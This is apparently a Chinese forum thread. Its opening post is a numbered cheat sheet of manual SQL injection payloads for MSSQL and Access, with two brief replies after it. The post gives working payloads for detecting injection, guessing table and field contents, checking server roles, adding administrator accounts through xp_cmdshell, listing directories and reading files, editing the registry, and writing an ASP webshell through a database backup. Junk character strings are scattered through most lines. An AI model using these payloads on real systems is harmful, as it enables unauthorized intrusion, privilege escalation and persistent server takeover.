社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4159阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 VO"/cG;]*  
  2.初步判断是否是mssql ;and user>0 n ~c<[  
Q{+*F8%8V<  
  3.注入参数是字符'and [查询条件] and ''=' ++9?LH4S4  
u^6@!M  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' u{| Q[hf[  
EY$Dtb+g8  
  5.判断数据库系统 aPU.fER  
?L K n  
  ;and (select count(*) from sysobjects)>0 mssql 6XP>qI,AJ  
}-Ds%L  
  ;and (select count(*) from msysobjects)>0 access 3(2WO^zX {  
fAEgrw%Ti  
<x!q! ;  
ye<b`bL2.  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 'iY~F0U  
Fb2,2Px  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `i!BXOOV{  
HZASIsl  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 M&QzsVH  
/"+CH\) E  
  9.(1)猜字段的ascii值(access) /EIQMZuYp  
0Cg}yyOz  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 J# >)+  
[ Xa,|  
  (2)猜字段的ascii值(mssql) lr*p\vH  
V),wDyi  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 T }}T`Ce  
@:dn\{Zsea  
  10.测试权限结构(mssql) <<=.;`(/v  
X!b+Dk  
u1}/SlCp  
lGlh/B%  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- %K`th&331  
L[s`8u<_)z  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4Wd H!z  
AZ9;6Df  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- B_uhNLd  
u Gmv`R_  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {xD\w^  
3 <A?  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 8|LU=p`y'  
~GLWhe-  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- A'tv[T d8,  
+F?}<P_v  
  ;and 1=(select IS_MEMBER('db_owner'));-- G$^u2wz.  
WaPuJ 5;e  
:hBLi99 o  
a'%eyN  
  11.添加mssql和系统的帐户 sv.?C pE  
q)l1tC72  
  ;exec master.dbo.sp_addlogin username;-- Zv0'OX~8i  
  ;exec master.dbo.sp_password null,username,password;-- tCR#TW+IY-  
zH13 ~\  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- _,<@II  
Ueu~803~  
  ;exec master.dbo.xp_cmdshell 'net user username password c(kYCVc   
w)XnMyD(P  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- "C.cU  
DO 0  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- -kP$S qR~  
Pil_zQ4  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Rb_%vOM  
aKFY&zN?  
kz"QS.${  
YfstE3BV  
  12.(1)遍历目录 FfX*bqy  
ei82pLM z  
  ;create table dirs(paths varchar(100), id int) OJ1MV7&  
lt("yqBu  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' [#SiwhF|  
eMLcm ZJR  
  ;and (select top 1 paths from dirs)>0 !{?<(6;t  
#Ibpf ,  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) KTE X]  
Hva/C{Y  
O'{g{  
(@Kc(>(: Y  
  (2)遍历目录 O|nLIfT  
'si{6t|  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- \iA.{,VX  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 eGLB,29g  
Ltk-1zhI  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $q##Tys  
iHT=ROL  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &a+=@Z)kf  
G+t=+T2m  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容  (F&o!W  
"vfpG7CG  
H@te!EE  
'?$R YU,  
  13.mssql中的存储过程 }LY)FT4n  
%us#p|Ya  
  xp_regenumvalues 注册表根键, 子键 \[d~O>k2  
WIN3*z7oW  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 YH&q5W,KX  
+q%b'!&Q  
  xp_regread 根键,子键,键值名 (W.G&VSn)  
9w6 uoM  
  ;exec xp_regread Fd#Zu.Np  
{(l,Uhxl""  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 mRy0zN>?  
M6j~`KSE  
  xp_regwrite 根键,子键, 值名, 值类型, 值 dwouw*8  
7#7AK}   
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 30O7u3Zrb  
T@Z-;^aV  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Hb[P|pPT  
}nptmc  
  xp_regdeletevalue 根键,子键,值名 d(K}v\3!  
>[ g=G  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 BZ(DP_}&D  
@SI,V8i  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Q\}Ck+d` a  
/I:&P Pff  
Hp*N%  
6m@B.+1  
  14.mssql的backup创建webshell RIDl4c [  
e|q~t {=9S  
  use model T!i$nI&  
/iL*)  
  create table cmd(str image); ltKMvGEF  
MpTOC&NG%s  
  insert into cmd(str) values (''); tns4e\  
Yy;BJ_  
  backup database model to disk='c:\l.asp'; y&V'GhW!dd  
?Iu=os>*  
&}t8O?!  
!3{;oU%*  
  15.mssql内置函数 q8HnPXV  
GE? \Vm  
  ;and (select @@version)>0 获得Windows的版本号 S|fb'  
F,V| In  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa @1i<=r  
3"sXN)j  
  ;and (select user_name())>0 爆当前系统的连接用户 s~ou$!|  
;/H/Gn+  
  ;and (select db_name())>0 得到当前连接的数据库 ,N nh$F  
[,{Nu EI  
U\!9dhx  
T=RabKVYP  
  16.简洁的webshell "y5bODq3t  
E^0a; |B[  
  use model w"W;PdH)  
?<S fhjU  
  create table cmd(str image); >x6)AH.  
QKhGEW~G  
  insert into cmd(str) values (''); J/3$I  
@( 0O9L F  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五